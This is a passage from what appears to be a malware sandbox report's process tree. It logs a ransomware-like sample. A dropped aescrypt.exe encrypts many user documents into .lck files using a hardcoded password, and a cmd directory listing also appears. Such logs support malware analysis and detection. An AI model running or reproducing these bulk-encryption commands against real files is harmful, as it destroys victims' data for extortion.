    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck" "UninstallGet.xls"
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck" "UninstallGet.xls.lck"
    3⤵
    PID:520
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck" "MoveComplete.vdx"
    3⤵
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck" "MoveComplete.vdx.lck"
    3⤵
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck" "CloseRevoke.xls"
    3⤵
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck" "CloseRevoke.xls.lck"
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck" "ApproveWrite.vsw"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck" "ApproveWrite.vsw.lck"
    3⤵
    PID:1352
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck" "SendRedo.pub"
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck" "SendRedo.pub.lck"
    3⤵
    PID:232
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck" "StepConnect.xlt"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck" "StepConnect.xlt.lck"
    3⤵
    PID:540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck" "EditPop.ppt"
    3⤵
    PID:988
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck" "EditPop.ppt.lck"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck" "DisableUnlock.ppsm"
    3⤵
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck" "DisableUnlock.ppsm.lck"
    3⤵
    PID:1604
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck" "ReceiveAssert.vstm"
    3⤵
    PID:1552
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck" "ReceiveAssert.vstm.lck"
    3⤵
    PID:440
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck" "ProtectSkip.xls"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck" "ProtectSkip.xls.lck"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck" "ApproveLimit.vsdx"
    3⤵
    PID:788
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck" "ApproveLimit.vsdx.lck"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck" "UnlockOptimize.htm"
    3⤵
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck" "UnlockOptimize.htm.lck"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck" "SearchInstall.odp"
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck" "SearchInstall.odp.lck"
    3⤵
    PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:528
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck" "desktop.ini.lck"
    3⤵
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
    3⤵
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck" "These.docx"
    3⤵
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck" "Are.docx"
    3⤵
    PID:1640
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck" "Recently.docx"
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck" "Opened.docx"
    3⤵
    PID:972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck" "Files.docx"
    3⤵
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck" "These.docx.lck"
    3⤵
    PID:1484
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck" "Are.docx.lck"
    3⤵
    PID:884
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck" "Recently.docx.lck"
    3⤵
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck" "Files.docx.lck"
    3⤵
    PID:1076
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck" "Opened.docx.lck"
    3⤵
    PID:892
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck.lck" "These.docx.lck.lck"
    3⤵
    PID:816
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck.lck" "Recently.docx.lck.lck"
    3⤵
    PID:1720
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck.lck" "Are.docx.lck.lck"
    3⤵
    PID:912
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck.lck" "Files.docx.lck.lck"
    3⤵
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck.lck" "Opened.docx.lck.lck"
    3⤵
    PID:344
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck" "SwitchOut.mhtml"
    3⤵
    PID:1908
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck" "SwitchOut.mhtml.lck"
    3⤵
    PID:208
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck.lck" "SwitchOut.mhtml.lck.lck"
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck" "ShowMount.vsdx"
    3⤵
    PID:296
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck" "ShowMount.vsdx.lck"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck.lck" "ShowMount.vsdx.lck.lck"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck" "ExpandInitialize.dotm"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck" "ExpandInitialize.dotm.lck"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck.lck" "ExpandInitialize.dotm.lck.lck"
    3⤵
    PID:1160
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck" "RequestSave.vsdm"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck" "RequestSave.vsdm.lck"
    3⤵
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck.lck" "RequestSave.vsdm.lck.lck"
    3⤵
    PID:1224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck" "PublishConnect.vdw"
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck" "PublishConnect.vdw.lck"
    3⤵
    PID:760
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck.lck" "PublishConnect.vdw.lck.lck"
    3⤵
    PID:1200
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck" "WatchStart.docm"
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck" "WatchStart.docm.lck"
    3⤵
    PID:520
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck.lck" "WatchStart.docm.lck.lck"
    3⤵
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck" "InvokeSubmit.doc"
    3⤵
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck" "InvokeSubmit.doc.lck"
    3⤵
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck.lck" "InvokeSubmit.doc.lck.lck"
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck" "FindSet.mhtml"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck" "FindSet.mhtml.lck"
    3⤵
    PID:892
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck.lck" "FindSet.mhtml.lck.lck"
    3⤵
    PID:540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck" "OptimizeRevoke.pptx"
    3⤵
    PID:912
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck" "OptimizeRevoke.pptx.lck"
    3⤵
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck.lck" "OptimizeRevoke.pptx.lck.lck"
    3⤵
    PID:344
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck" "ResolveResize.vsw"
    3⤵
    PID:1908
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck" "ResolveResize.vsw.lck"
    3⤵
    PID:208
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck.lck" "ResolveResize.vsw.lck.lck"
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck" "SaveWatch.vsw"
    3⤵
    PID:296
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck" "SaveWatch.vsw.lck"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck.lck" "SaveWatch.vsw.lck.lck"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck" "ResumeClose.pptx"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck" "ResumeClose.pptx.lck"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck.lck" "ResumeClose.pptx.lck.lck"
    3⤵
    PID:1160
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck" "UninstallGet.xls"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck" "UninstallGet.xls.lck"
    3⤵
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck.lck" "UninstallGet.xls.lck.lck"
    3⤵
    PID:1224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck" "MoveComplete.vdx"
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck" "MoveComplete.vdx.lck"
    3⤵
    PID:760
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck.lck" "MoveComplete.vdx.lck.lck"
    3⤵
    PID:1200
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck" "CloseRevoke.xls"
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck" "CloseRevoke.xls.lck"
    3⤵
    PID:520
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck.lck" "CloseRevoke.xls.lck.lck"
    3⤵
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck" "ApproveWrite.vsw"
    3⤵
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck" "ApproveWrite.vsw.lck"
    3⤵
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck.lck" "ApproveWrite.vsw.lck.lck"
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck" "SendRedo.pub"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck" "SendRedo.pub.lck"
    3⤵
    PID:228
